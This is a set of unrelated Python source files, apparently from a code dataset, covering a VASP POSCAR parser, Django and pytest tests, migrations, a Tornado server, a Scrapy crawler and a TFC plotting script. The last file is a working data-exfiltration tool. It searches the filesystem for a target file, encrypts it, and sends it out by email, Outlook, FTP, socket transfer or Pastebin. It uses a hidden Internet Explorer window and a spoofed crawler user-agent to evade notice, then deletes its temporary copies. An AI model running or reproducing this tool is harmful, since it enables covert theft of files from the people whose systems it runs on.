def read_poscar(path='POSCAR'):
"""
Load a POSCAR file and return a pychemia structure object
:param path: (str) Filename of the POSCAR to read
:return:
"""
if os.path.isfile(path):
poscarfile = path
if os.path.dirname(path) != '':
potcarfile = os.path.dirname(path) + os.sep + 'POTCAR'
else:
potcarfile = 'POTCAR'
elif os.path.isdir(path) and os.path.isfile(path + os.sep + 'POSCAR'):
poscarfile = path + os.sep + 'POSCAR'
potcarfile = path + os.sep + 'POTCAR'
else:
print("POSCAR path not found")
return
# Reading the POSCAR file
rf = open(poscarfile, 'r')
comment = rf.readline().strip()
latconst = float(rf.readline())
newcell = _np.zeros((3, 3))
newcell[0, :] = latconst * _np.array([float(x) for x in rf.readline().split()])
newcell[1, :] = latconst * _np.array([float(x) for x in rf.readline().split()])
newcell[2, :] = latconst * _np.array([float(x) for x in rf.readline().split()])
line = rf.readline()
species = None
try:
natom_per_species = _np.array([int(x) for x in line.split()])
# print 'Old Format'
except ValueError:
# print 'New format'
species = [x for x in line.split()]
line = rf.readline()
natom_per_species = _np.array([int(x) for x in line.split()])
natom = _np.sum(natom_per_species)
if species is None:
if os.path.isfile(potcarfile):
species = get_species(potcarfile)
elif len(comment.split()) == len(natom_per_species):
species = comment.split()
else:
print(""" ERROR: The POSCAR does not contain information about the species present on the structure
You can set a consistent POTCAR along the POSCAR or
modify your POSCAR by adding the atomic symbol on the sixth line of the file""")
return None
if not species:
print('No information about species')
raise ValueError()
symbols = []
for i in range(len(natom_per_species)):
numspe = natom_per_species[i]
for j in range(numspe):
symbols.append(species[i])
mode = rf.readline()
if mode[0].lower() in ['c', 'k']:
kmode = 'Cartesian'
else:
kmode = 'Direct'
pos = []
for i in range(natom):
pos += [float(x) for x in rf.readline().split()[:3]]
pos = _np.array(pos).reshape((-1, 3))
if kmode == 'Cartesian':
return pychemia.Structure(cell=newcell, symbols=symbols, reduced=pos, comment=comment)
else:
return pychemia.Structure(cell=newcell, symbols=symbols, reduced=pos, comment=comment)
def write_poscar(structure, filepath='POSCAR', newformat=True):
"""
Takes an structure from pychemia and save the file
POSCAR for VASP.
:param structure: (pychemia.Structure) Structure to write POSCAR
:param filepath: (str) Filename of POSCAR file to create
:param newformat: (bool) If the new VASP format is used to create the POSCAR
"""
ret = ''
comp = structure.get_composition()
for i in comp.species:
ret += ' ' + i
ret += '\n'
ret += '1.0\n'
for i in range(3):
ret += ' %20.16f %20.16f %20.16f\n' % tuple(structure.cell[i])
if newformat:
for i in comp.species:
ret += ' ' + i
ret += '\n'
for i in comp.values:
ret += ' ' + str(i)
ret += '\n'
ret += 'Direct\n'
for i in range(structure.natom):
ret += ' %20.16f %20.16f %20.16f\n' % tuple(structure.reduced[i])
wf = open(filepath, 'w')
wf.write(ret)
wf.close()
def get_species(path):
species = []
rf = open(path, 'r')
for line in rf.readlines():
if 'PAW_PBE' in line and 'PAW_PBE' == line.split()[0].strip():
species.append(line.split()[1].split('_')[0])
if 'PAW' in line and 'PAW' == line.split()[0].strip() and 'radial' not in line:
species.append(line.split()[1].split('_')[0])
return species
def write_potcar(structure, filepath='POTCAR', pspdir='potpaw_PBE', options=None, pspfiles=None):
comp = structure.get_composition()
ret = ''
psppath = os.getenv('HOME') + '/.vasp/PP-VASP/' + pspdir
if not os.path.exists(psppath):
raise ValueError("The path for VASP Pseudo-potentials does not exists: " + psppath)
if pspfiles is None:
pspfiles = []
for i in comp.species:
if options is not None and i in options:
if isinstance(options[i], str):
pspfile = psppath + os.sep + i + '_' + options[i] + '/POTCAR'
elif isinstance(options[i], list):
for j in options[i]:
pspfile = psppath + os.sep + i + '_' + options[i][j] + '/POTCAR'
if os.path.isfile(psppath):
break
else:
for j in ['', '_sv']:
pspfile = psppath + os.sep + i + j + '/POTCAR'
if os.path.isfile(pspfile):
break
else:
pass
# print pspfile, 'is not present...'
if not os.path.isfile(pspfile):
raise ValueError("File not found : " + pspfile)
pspfiles.append(pspfile)
for pspfile in pspfiles:
rf = open(pspfile)
ret += rf.read()
rf.close()
wf = open(filepath, 'w')
wf.write(ret)
wf.close()
return pspfiles
| StarcoderdataPython |
3455021 | from rest_framework import status
from rest_framework.reverse import reverse
from tests.test_service_catalog.base_test_request import BaseTestRequest
from tests.utils import check_data_in_dict
class TestApiTowerServerPut(BaseTestRequest):
def setUp(self):
super(TestApiTowerServerPut, self).setUp()
self.put_data = {
'name': "New Tower Server",
'host': "my-tower-domain.com",
'token': "<PASSWORD>",
'secure': True,
'ssl_verify': False
}
self.kwargs = {
'pk': self.tower_server_test.id
}
self.tower_server_url = reverse('api_tower_server_details', kwargs=self.kwargs)
def test_admin_put_tower_server(self):
response = self.client.put(self.tower_server_url, data=self.put_data, content_type="application/json")
self.assertEqual(response.status_code, status.HTTP_200_OK)
check_data_in_dict(self, [self.put_data], [response.data])
def test_admin_cannot_put_on_tower_server_not_full(self):
self.put_data.pop('name')
response = self.client.put(self.tower_server_url, data=self.put_data, content_type="application/json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_customer_cannot_put_tower_server(self):
self.client.force_login(user=self.standard_user)
response = self.client.put(self.tower_server_url, data=self.put_data, content_type="application/json")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_cannot_put_tower_server_when_logout(self):
self.client.logout()
response = self.client.put(self.tower_server_url, data=self.put_data, content_type="application/json")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
| StarcoderdataPython |
9767614 | #!/usr/bin/env python
from setuptools import setup, find_packages
import re
# get version from init file
with open('ginjinn/__init__.py', 'r') as f:
VERSION=re.search(
r"^__version__ = ['\"]([^'\"]*)['\"]",
f.read(),
re.M
).group(1)
DESCRIPTION='Object detection pipeline for the extraction of structures from herbarium specimens'
def install_requires():
'''Get requirements from requirements.txt'''
# with open('requirements.txt') as f:
# return f.read().splitlines()
return []
setup(
name='ginjinn',
version=VERSION,
url='https://github.com/AGOberprieler/ginjinn',
author='<NAME>',
author_email='<EMAIL>',
description=DESCRIPTION,
packages=find_packages(),
install_requires=install_requires(),
entry_points={
'console_scripts': [
'ginjinn = ginjinn.__main__:main',
]
},
package_data={
'ginjinn': [
'data_files/*.yaml',
'data_files/tf_config_templates/*.config',
'data_files/tf_script_templates/*',
'data_files/*',
],
}
) | StarcoderdataPython |
141451 | <reponame>kubikvid/weather-this-day<filename>backend/main.py
# Copyright (c) 2019. Lorem ipsum dolor sit amet, consectetur adipiscing elit.
# Morbi non lorem porttitor neque feugiat blandit. Ut vitae ipsum eget quam lacinia accumsan.
# Etiam sed turpis ac ipsum condimentum fringilla. Maecenas magna.
# Proin dapibus sapien vel ante. Aliquam erat volutpat. Pellentesque sagittis ligula eget metus.
# Vestibulum commodo. Ut rhoncus gravida arcu.
from typing import Optional, Awaitable
from sys import argv
from tornado.web import RequestHandler, Application
from tornado.ioloop import IOLoop
# from handlers.history import History
import handlers.history
from lib.db_methods import MongoHandler
class BasicHandler(RequestHandler):
db_handler = MongoHandler()
def prepare(self) -> Optional[Awaitable[None]]:
return super().prepare()
def on_finish(self) -> None:
super().on_finish()
def get_app():
return Application([
(r'/api/history', handlers.history.History)
],
autoreload=True
# mongo_handler=MONGO_HANDLER
)
def run():
if len(argv) < 2:
port = 8080
else:
try:
port = int(argv[1])
except ValueError as ve:
print("Error: please provide a correct port")
exit(0)
else:
app = get_app()
try:
print(f"Started on localhost:{port}")
app.listen(port)
IOLoop.current().start()
except Exception as e:
print(f"Cannot start server with given port")
exit(0)
if __name__ == '__main__':
run()
| StarcoderdataPython |
3390588 | <reponame>leakec/tfc<gh_stars>10-100
# This script solves Problem #6 of Chapter 1's exercises in the TFC book
####################################################################################################
# Create a constrained expression which begins at (-1,-1) and ends at (1,1).
# The constrained expression should also a void a box whose corners are
# given by (-0.5,-0.5) and (0.5,0.5).
####################################################################################################
from tfc import utfc
from tfc.utils import MakePlot, step
import jax.numpy as np
from matplotlib.patches import Rectangle
import numpy as onp
####################################################################################################
## user defined parameters: ************************************************************************
N = 1000 # number of discretization points per TFC step
m = 10 # number of basis function terms
basis = 'CP' # basis function type
nC = 2 # number of constraints
## problem initial conditions: *********************************************************************
tspan = [0., 1.] # time range of problem
initial = np.array([-1.0, -1.0])
final = np.array([ 1.0, 1.0])
Nlines = 20
## keep-out parameters: ****************************************************************************
xbound = np.array([-0.5, 0.5])
ybound = np.array([-0.5, 0.5])
## construct univariate tfc class: *****************************************************************
tfc = utfc(N, nC, m, basis = basis, x0=tspan[0], xf=tspan[-1])
t = tfc.x
H = tfc.H
H0 = H(t[0])
Hf = H(t[-1])
## define tfc constrained expression: **************************************************************
# switching function
phi1 = lambda t: (t[-1] - t) / (t[-1] - t[0])
phi2 = lambda t: (t - t[0]) / (t[-1] - t[0])
# tfc constrained expression (without inequality constraints)
xhat = lambda xi: np.dot(H(t),xi) + phi1(t)*(initial[0] - np.dot(H0,xi)) \
+ phi2(t)*(final[0] - np.dot(Hf,xi))
yhat = lambda xi: np.dot(H(t),xi) + phi1(t)*(initial[1] - np.dot(H0,xi)) \
+ phi2(t)*(final[1] - np.dot(Hf,xi))
# construct pseudo-switching functions for the box constraints
Phi1 = lambda ghat, bound: step(bound[1] - ghat)
Phi2 = lambda ghat, bound: step(ghat - bound[0])
Phi3 = lambda ghat, bound: step((bound[1]+bound[0])/2. - ghat)
# tfc constrained expression (with inequality constraints)
x = lambda x_xi, y_xi: xhat(x_xi) \
+ (xbound[0]-xhat(x_xi))*(Phi1(yhat(y_xi),ybound)*Phi2(yhat(y_xi),ybound) *\
Phi3(xhat(x_xi),xbound)*Phi2(xhat(x_xi),xbound)) \
+ (xbound[1]-xhat(x_xi))*(Phi1(yhat(y_xi),ybound)*Phi2(yhat(y_xi),ybound) *\
Phi3(-xhat(x_xi),-xbound)*Phi1(xhat(x_xi),xbound))
y = lambda x_xi, y_xi: yhat(y_xi) \
+ (ybound[0]-yhat(y_xi))*(Phi1(xhat(x_xi),xbound)*Phi2(xhat(x_xi),xbound) *\
Phi3(yhat(y_xi),ybound)*Phi2(yhat(y_xi),ybound)) \
+ (ybound[1]-yhat(y_xi))*(Phi1(xhat(x_xi),xbound)*Phi2(xhat(x_xi),xbound) *\
Phi3(-yhat(y_xi),-ybound)*Phi1(yhat(y_xi),ybound))
onp.random.seed(4) # fixes random seed to creat the same plot in book
x_xi = 0.1 * onp.random.randn(H(t).shape[1], Nlines)
y_xi = 0.1 * onp.random.randn(H(t).shape[1], Nlines)
## plotting: ***************************************************************************************
p1 = MakePlot(r'$x(t)$',r'$y(t)$')
for i in range(Nlines):
p1.ax[0].plot(x(x_xi[:,i],y_xi[:,i]), y(x_xi[:,i],y_xi[:,i]))
p1.ax[0].add_patch(Rectangle((xbound[0],ybound[0]), xbound[1]-xbound[0], ybound[1]-ybound[0], fc='white',ec="white"))
p1.ax[0].plot(initial[0], initial[1], 'ko', markersize = 10)
p1.ax[0].plot(final[0], final[1], 'ko', markersize = 10)
p1.PartScreen(7.,6.)
p1.show()
| StarcoderdataPython |
1835243 | <reponame>Cent-Luc/University_Portal<filename>students/migrations/0002_auto_20191126_0241.py
# Generated by Django 2.2.7 on 2019-11-26 02:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('students', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='student',
name='level_of_study',
field=models.CharField(choices=[('Certificate', 'Certificate'), ('Diploma', 'Diploma'), ('Degree', 'Degree'), ('Master', 'Master')], max_length=15),
),
]
| StarcoderdataPython |
65548 | from oso import Oso
from .auth import register_models
class SQLAlchemyOso(Oso):
"""The central object to manage application policy state, e.g.
the policy data, and verify requests when using Oso with SQLAlchemy.
Supports SQLAlchemy-specific functionality, including data filtering.
Accepts a SQLAlchemy declarative_base on initialization, which is used to register
all relevant SQLAlchemy models with Oso.
>>> from sqlalchemy_oso import SQLAlchemyOso
>>> from sqlalchemy.ext.declarative import declarative_base
>>> Base = declarative_base(name="MyBaseModel")
>>> SQLAlchemyOso(Base)
<sqlalchemy_oso.oso.SQLAlchemyOso object at 0x...>
"""
def __init__(self, sqlalchemy_base):
super().__init__()
# Register all sqlalchemy models on sqlalchemy_base
register_models(self, sqlalchemy_base)
self.base = sqlalchemy_base
| StarcoderdataPython |
1653231 | <filename>api/tests/test_views.py<gh_stars>10-100
import pytest
from django.core.cache import cache
from django.shortcuts import reverse
from rest_framework.test import APIClient
from core.recipe import recipe_sites
client = APIClient()
@pytest.mark.django_db
def test_no_url_error():
response = client.post(reverse("calculate-from-url"), {}, format="json")
assert response.status_code == 400
@pytest.mark.django_db
def test_domain_not_supported():
response = client.post(
reverse("calculate-from-url"),
{"url": "http://notsupportedsite.org"},
format="json",
)
assert response.status_code == 400
@pytest.mark.django_db
def test_supported_but_bad_response():
response = client.post(
reverse("calculate-from-url"),
{"url": "https://www.kwestiasmaku.com/recipe-doesnt-exist"},
format="json",
)
assert response.status_code == 400
@pytest.mark.django_db
def valid_url_but_no_recipe():
response = client.post(
reverse("calculate-from-url"),
{"url": "https://www.kwestiasmaku.com/"},
format="json",
)
assert response.status_code == 400
@pytest.mark.django_db
def test_cache(settings):
# This test will fail with dummy backend.
# if settings.CACHES['default']['BACKEND'] == "django.core.cache.backends.dummy.DummyCache":
# return
url = "https://www.kwestiasmaku.com/przepis/kurczak-slodko-kwasny"
cache.delete(url)
response = client.post(reverse("calculate-from-url"), {"url": url}, format="json")
assert response.status_code == 200
assert cache.get(url) is not None
@pytest.mark.django_db
class TestCalculateFromTextApiView:
url = reverse("calculate-from-text")
client = APIClient()
def test_return_400_when_invalid_ingredients(self):
"""Ensure that view returns HTTP 400 when given invalid ingredients parameter"""
# blank ingredients
response = self.client.post(self.url, {})
assert response.status_code == 400
# integer (not a string or array-like)
response = self.client.post(self.url, {"ingredients": 5}, format="json")
assert response.status_code == 400
def test_return_400_when_invalid_servings(self):
"""Ensure that view returns HTTP 400 when given invalid servings parameter"""
# lower than 1
response = self.client.post(
self.url, {"ingredients": "abc", "servings": 0}, format="json"
)
assert response.status_code == 400
# not an integer
response = self.client.post(
self.url, {"ingredients": "abc", "servings": 1.5}, format="json"
)
assert response.status_code == 400
def test_return_200_when_valid_ingredients(self):
"""Ensure that view can return HTTP 200 when given valid ingredients"""
# list
response = self.client.post(self.url, {"ingredients": ["abc"]}, format="json")
assert response.status_code == 200
# tuple
response = self.client.post(self.url, {"ingredients": ("abc",)}, format="json")
assert response.status_code == 200
def test_view_splits_ingredients_correctly(self):
"""Ensure that ingredients are split according to the type"""
# list
response = self.client.post(
self.url, {"ingredients": ["abc", "def"]}, format="json"
)
assert response.data["ingredients"] == ["abc", "def"]
# tuple
response = self.client.post(
self.url, {"ingredients": ("abc", "def")}, format="json"
)
assert response.data["ingredients"] == ["abc", "def"]
| StarcoderdataPython |
58036 | <reponame>RonaldKiprotich/Neighborhood
# Generated by Django 3.1.3 on 2020-12-02 09:55
import cloudinary.models
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('neighapp', '0003_neighbourhood'),
]
operations = [
migrations.CreateModel(
name='Occupant',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=120)),
('profile_pic', cloudinary.models.CloudinaryField(max_length=255, verbose_name='image')),
('neighbourhood', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='occupant', to='neighapp.neighbourhood')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Business',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=120)),
('email', models.EmailField(max_length=254)),
('description', models.TextField(blank=True)),
('location', models.CharField(max_length=60)),
('neighbourhood', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='business', to='neighapp.neighbourhood')),
],
),
]
| StarcoderdataPython |
1768050 | from __future__ import absolute_import
# getting all links example crawling jamescampbell.us
# author: <NAME>
# Date Created: 2015 05 22
# Date Updated: 2 July 2019
import argparse
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor
from scrapy.item import Item, Field
# terminal arguments parser globals - do not change
parser = argparse.ArgumentParser()
parser.add_argument('-u', action='store', dest='url',
help='Domain to crawl')
parser.add_argument('-c', action='store_const', dest='constant_value',
const='value-to-store',
help='Store a constant value')
parser.add_argument('--version', action='version', version='%(prog)s 1.0')
results = parser.parse_args()
# setup the default search terms
domainer = 'jamescampbell.us' # default search term if none set is a random term from a dict
if results.url is not None: # if search terms set then change from default to that
domainer = results.url # set from argparse above in globals section
DOMAIN = domainer
URL = 'https://%s' % DOMAIN
class MyItem(Item):
url = Field()
class someSpider(CrawlSpider):
name = 'crawltest'
allowed_domains = ['jamescampbell.us']
start_urls = ['https://jamescampbell.us']
rules = (Rule(LxmlLinkExtractor(allow=()), callback='parse_obj', follow=True),)
def parse_obj(self, response):
item = MyItem()
item['url'] = []
for link in LxmlLinkExtractor(allow=(), deny=self.allowed_domains).extract_links(response):
item['url'].append(link.url)
print(link.url)
return item
someSpider()
| StarcoderdataPython |
9661713 | import os
import pytest
from sqlalchemy import event
from sqlalchemy.orm import Session
from zeus import config
from zeus.storage.mock import FileStorageCache
@pytest.fixture(scope="session")
def session_config(request):
return {"db_name": "test_zeus"}
@pytest.fixture(scope="session")
def app(request, session_config):
app = config.create_app(
_read_config=False,
SQLALCHEMY_DATABASE_URI="postgresql:///" + session_config["db_name"],
FILE_STORAGE={"backend": "zeus.storage.mock.FileStorageCache"},
SECRET_KEY=os.urandom(24),
GITHUB_CLIENT_ID="github.client-id",
GITHUB_CLIENT_SECRET="github.client-secret",
MAIL_SUPPRESS_SEND=True,
NPLUSONE_RAISE=True,
)
app.testing = True
yield app
@pytest.fixture(scope="session", autouse=True)
def db(request, app, session_config):
db_name = session_config["db_name"]
with app.app_context():
# Postgres 9.1 does not support --if-exists
if os.system("psql -l | grep '%s'" % db_name) == 0:
assert not os.system("dropdb %s" % db_name)
assert not os.system("createdb -E utf-8 %s" % db_name)
config.alembic.upgrade()
# TODO: need to kill db connections in order to drop database
# config.db.drop_all()
# os.system('dropdb %s' % db_name)
return config.db
@event.listens_for(Session, "after_transaction_end")
def restart_savepoint(session, transaction):
if transaction.nested and not transaction._parent.nested:
session.begin_nested()
@pytest.fixture(scope="function")
def req_ctx(request, app):
with app.test_request_context() as req_ctx:
yield req_ctx
@pytest.fixture(scope="function", autouse=True)
def db_session(request, req_ctx, db):
db.session.begin_nested()
yield db.session
# transaction.rollback()
# connection.close()
# db.session.remove()
@pytest.fixture(scope="function", autouse=True)
def filestorage(app):
FileStorageCache.clear()
yield FileStorageCache
@pytest.fixture(scope="function", autouse=True)
def redis(app):
config.redis.flushdb()
yield config.redis
@pytest.fixture(scope="function")
def client(app):
with app.test_client() as client:
yield client
@pytest.fixture(scope="function", autouse=True)
def outbox(app):
with config.mail.record_messages() as ob:
yield ob
@pytest.fixture
def private_key():
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend
return rsa.generate_private_key(
backend=default_backend(), public_exponent=65537, key_size=2048
)
@pytest.fixture
def public_key(private_key):
return private_key.public_key()
@pytest.fixture
def public_key_bytes(public_key):
from cryptography.hazmat.primitives import serialization
return public_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo,
)
| StarcoderdataPython |
3368707 | <filename>Exfiltration/exfil.py
from Cryptodome.Cipher import AES, PKCS1_OAEP
from Cryptodome.PublicKey import RSA
from Cryptodome.Random import get_random_bytes
from io import BytesIO
import argparse
import base64
import ftplib
import getpass
import os
import random
import requests
import smtplib
import socket
import textwrap
import time
import zlib
def decrypt(encrypted_data):
''' Decrypts the payload and returns the plaintext.'''
encrypted_bytes = BytesIO(base64.decodebytes(encrypted_data))
RSA_cipher, keysize_in_bytes = get_RSA_cipher('pri')
# Note the session key is derived from the key size of the private key.
encrypted_session_key = encrypted_bytes.read(keysize_in_bytes)
nonce = encrypted_bytes.read(16)
tag = encrypted_bytes.read(16)
ciphertext = encrypted_bytes.read()
# Decrypt the session key using the RSA key
session_key = RSA_cipher.decrypt(encrypted_session_key)
AES_cipher = AES.new(session_key, AES.MODE_EAX, nonce)
# Decrypt the message with AES cipher
decrypted = AES_cipher.decrypt_and_verify(ciphertext, tag)
plaintext = zlib.decompress(decrypted)
return plaintext
def encrypt(plaintext):
''' Generates AES key and encrypts it with RSA. It returns the encrypted data.'''
# Generate AES cipher
session_key = get_random_bytes(16)
AES_cipher = AES.new(session_key, AES.MODE_EAX)
# Compress plaintext and encrypt it with AES
compressed_text = zlib.compress(plaintext)
ciphertext, tag = AES_cipher.encrypt_and_digest(compressed_text)
# Use RSA public key to encrypt AES session key.
RSA_cipher, _ = get_RSA_cipher('pub')
encrypted_session_key = RSA_cipher.encrypt(session_key)
# The payload to decrypt will include:
msg_payload = encrypted_session_key + AES_cipher.nonce + tag + ciphertext
# Base64 encode it
encrypted = base64.encodebytes(msg_payload)
return encrypted
def outlook(subject, contents):
''' Windows email sender. '''
# Use WIN32COM to create an instance of the Outlook application
outlook = win32com.client.Dispatch("Outlook.Application")
message = outlook.CreateItem(0)
message.DeleteAfterSubmit = True
message.Subject = subject
message.Body = contents.decode()
message.To = tgt_accts[0]
message.Send()
def plain_email(subject, contents):
''' Platform-independant email sender.'''
message = f'Subject: {subject}\nFrom {smtp_acct}\n'
message += f'To: {tgt_accts}\n\n{contents.decode()}'
server = smtplib.SMTP(smtp_server, smtp_port)
server.starttls()
try:
server.login(smtp_acct, smtp_password)
# server.set_debuglevel(1)
server.sendmail(smtp_acct, tgt_accts, message)
time.sleep(1)
print("[+] Email sent successfully! ")
server.quit()
except smtplib.SMTPAuthenticationError:
print("[!] SMTP Authentication error, verify your username/password, hun.")
server.quit()
def RSA_generate():
''' Generate public/private keys for the asymmetric RSA encryption and store them in your current folder.'''
new_key = RSA.generate(2048)
private_key = new_key.exportKey()
public_key = new_key.publickey().exportKey()
with open('key.pri', 'wb') as f:
f.write(private_key)
with open('key.pub', 'wb') as f:
f.write(public_key)
def get_RSA_cipher(keytype):
''' Helper to grab either of the two RSA keys as needed. Returns the cipher object and the size of the key.'''
with open(f'key.{keytype}') as f:
key = f.read()
rsakey = RSA.importKey(key)
# Returns an RSA cipher object and the size of the RSA key in bytes
return (PKCS1_OAEP.new(rsakey), rsakey.size_in_bytes())
def find_docs(doc_type='.pdf'):
''' Walk entire filysystem to find files and returns its absolute path.'''
if os.name == 'nt':
for parent, _, filenames in os.walk('C:\\'):
for filename in filenames:
if filename.endswith(doc_type):
document_path = os.path.join(parent, filename)
yield document_path
else:
for parent, _, filenames in os.walk('/'):
for filename in filenames:
# if filename.endswith(doc_type):
if filename == doc_type:
print(f"[+] Filename '{filename}' found!\n[+] Preparing exfiltration...")
document_path = os.path.join(parent, filename)
# return document_path
# print(document_path)
yield document_path
return
print("[!] File not found :( Check for any typos, hun.")
def exfiltrate(document_path, method):
''' Grabs a file and exfiltrates it based on the method you provide.'''
# File transfer: Read, encrypt and save in tmp/.
if method in ['transmit', 'plain_ftp']:
if os.name == 'nt':
filename = f'C:\\Windows\\Temp\\{os.path.basename(document_path)}.duplicate'
with open (document_path, 'rb') as f0:
contents = f0.read()
with open(filename, 'wb') as f1:
f1.write(encrypt(contents))
# Send the file and delete it immediately.
EXFIL[method](filename)
os.unlink(filename)
print(f"[+] File '{filename}' was deleted from your system.")
else:
filename = f'/tmp/{os.path.basename(document_path)}.duplicate'
with open (document_path, 'rb') as f0:
contents = f0.read()
with open(filename, 'wb') as f1:
f1.write(encrypt(contents))
# Send the file and delete it immediately.
EXFIL[method](filename)
os.unlink(filename)
print(f"[+] File '{filename}' was deleted.")
else:
# print(document_path)
# print(type(document_path))
with open(document_path, 'rb') as f:
contents = f.read()
title = os.path.basename(document_path)
contents = encrypt(contents)
# print(title)
# print(contents)
EXFIL[method](title, contents)
def email_helper():
global doc_type, tgt_accts, smtp_acct, smtp_password, smtp_server, smtp_port
doc_type = input("Enter the filename you want to encrypt and email: ")
tgt_accts = input('To: ')
if os.name == 'nt':
import win32com.client
for fpath in find_docs(doc_type):
exfiltrate(fpath, 'outlook')
else:
# Google's SMTP info
smtp_server = 'smtp.gmail.com'
smtp_port = 587
smtp_acct = input('From: ')
smtp_password = <PASSWORD>()
for fpath in find_docs(doc_type):
exfiltrate(fpath, 'plain_email')
def file_helper():
global doc_type, server
doc_type = input("Enter the filename you want to encrypt and send via file transfer: ")
for fpath in find_docs(doc_type):
if os.name == 'nt':
import win32file
server = input("Enter the host you'd like to connect to: ")
exfiltrate(fpath, 'transmit')
else:
ftp_server = input("Enter FTP server IP: ")
exfiltrate(fpath, 'plain_ftp')
def transmit(filepath, server='10.0.2.13'):
'''Windows version'''
client = socket.socket()
# Open a port of our choosing
try:
client.connect((server, 10000))
except socket.error:
print("The connection was refused.")
return
with open(filepath, 'rb') as f:
win32file.TransmitFile(
client, win32file._get_osfhandle(f.fileno()), 0, 0, None, 0, b'', b'')
print(f'\nFile {filepath} was sent successfully.')
def plain_ftp(filepath, ftp_server='10.0.2.13'):
try:
ftp = ftplib.FTP(ftp_server)
except OSError:
print("[!] Unable to connect to the server. Try to ping it or check if the service is running.")
return
ftp.login("anonymous", "<EMAIL>")
ftp.cwd('/pub/')
ftp.storbinary("STOR " + os.path.basename(filepath), open(filepath, "rb"), 1024)
ftp.quit()
print(f'\nFile {filepath} was sent successfully.')
def plain_paste(title, contents):
login_url = 'https://pastebin.com/api/api_login.php'
login_data = {
'api_dev_key': api_dev_key,
'api_user_name': username,
'api_user_password': password,
}
r = requests.post(login_url, data=login_data, headers=header)
api_user_key = r.text
paste_url = 'https://pastebin.com/api/api_post.php'
paste_data = {
'api_paste_name': title,
'api_paste_code': contents.decode(),
'api_dev_key': api_dev_key,
'api_user_key': api_user_key,
'api_option': 'paste',
'api_paste_private': 0,
}
r = requests.post(paste_url, data=paste_data, headers=header)
if (r.status_code == 200):
print(f"[+] Data has been posted successfully: {r.text}")
if (r.status_code == 422):
print(f"[!] Authentication error: Please check your credentials, hun")
def wait_for_browser(browser):
''' Ensures the browser has finished its events and can be used.'''
# Wait for browser to finish loading and its events have been completed.
while browser.ReadyState != 4 and browser.ReadyState != 'complete':
time.sleep(0.1)
def random_sleep():
''' Allows the browser to execute tasks that may have not been registered as events by the DOM.
Makes the browser act as normal user behaviour.'''
time.sleep(random.randint(5,10))
def login(ie):
''' Interacts with the DOM to find all HTML elements required to log in through Internet Explorer.'''
full_doc = ie.Document.all
for elem in full_doc:
if elem.id == 'loginform-username':
elem.setAttribute('value', username)
elif elem.id == 'loginform-password':
elem.setAttribute('value', password)
random_sleep()
if ie.Document.forms[0].id == 'w0':
ie.Document.forms[0].submit()
wait_for_browser(ie)
def submit(ie, title, contents):
full_doc = ie.Document.all
for elem in full_doc:
if elem.id == 'postform-name':
elem.setAttribute('value', title)
elif elem.id == 'postform-text':
elem.setAttribute('value', contents)
if ie.document.forms[0].id == 'w0':
ie.document.forms[0].submit()
random_sleep()
wait_for_browser(ie)
def ie_paste(title, contents):
''' Open an IE instnace, browse to Pastebin and submit your encrypted file.'''
# Create a new instance of IE COM object
ie = client.Dispatch('InternetExplorer.Application')
# Do you want the process to be visible? Debugging = 1, Stealth = 0
ie.Visible = 0
ie.Navigate('https://pastebin.com/login', Headers=header)
wait_for_browser(ie)
login(ie)
ie.Navigate('https://pastebin.com/')
wait_for_browser(ie)
submit(ie, title, contents.decode())
ie.Quit()
def post_helper():
global agent, header, doc_type, api_dev_key, username, password
# Authentication
username = input("Enter your Pastebin username: ")
password = getpass.getpass(prompt='Enter your Pastebin password: ')
# Yahoo web crawler
agent = 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'
header = {'User-Agent': agent}
doc_type = input("Enter the filename you want to encrypt and post: ")
if os.name == 'nt':
from win32com import client
for fpath in find_docs(doc_type):
exfiltrate(fpath, 'ie_paste')
else:
api_dev_key = input("Enter your Pastebin API key: ")
for fpath in find_docs(doc_type):
exfiltrate(fpath, 'plain_paste')
# Dictionary dispatch to make the calling of the functions easy
EXFIL = {
'outlook': outlook,
'plain_email': plain_email,
'plain_ftp': plain_ftp,
'transmit': transmit,
'ie_paste': ie_paste,
'plain_paste': plain_paste,
}
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Exfiltration Tool',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog = textwrap.dedent('''Example:
$ python3 exfil.py -e --encrypt # Type in some text, encrypt it and save it into a new file.
$ python3 exfil.py -d --decrypt # Read from a file and decrypt its contents in terminal.
$ python3 exfil.py -m --mail # Encrypt a file and send it out in an email.
$ python3 exfil.py -f --file # Encrypt a file and send it out via file transfer.
$ python3 exfil.py -p --post # Encrypt a file and post it in Pastebin.
'''))
parser.add_argument('-e', '--encrypt', action = 'store_true', help = 'Encrypt data and dump into a new file')
parser.add_argument('-d', '--decrypt', action = 'store_true', help = 'Decrypt ciphertext from a file')
parser.add_argument('-m', '--mail', action = 'store_true', help = 'Encrypt a file and send it out in an email.')
parser.add_argument('-f', '--file', action = 'store_true', help = 'Encrypt a file and send it out via file transfer.')
parser.add_argument('-p', '--post', action = 'store_true', help = 'Encrypt a file and post it in Pastebin.')
args = parser.parse_args()
if (not os.path.isfile('key.pub')) and (not os.path.isfile('key.pri')):
print("[!] It looks like you do not have an RSA key pair. Don't you worry child, I will generate a pair for ya.")
RSA_generate()
if args.encrypt:
filename = input("Enter the filename of your new ciphertext: ")
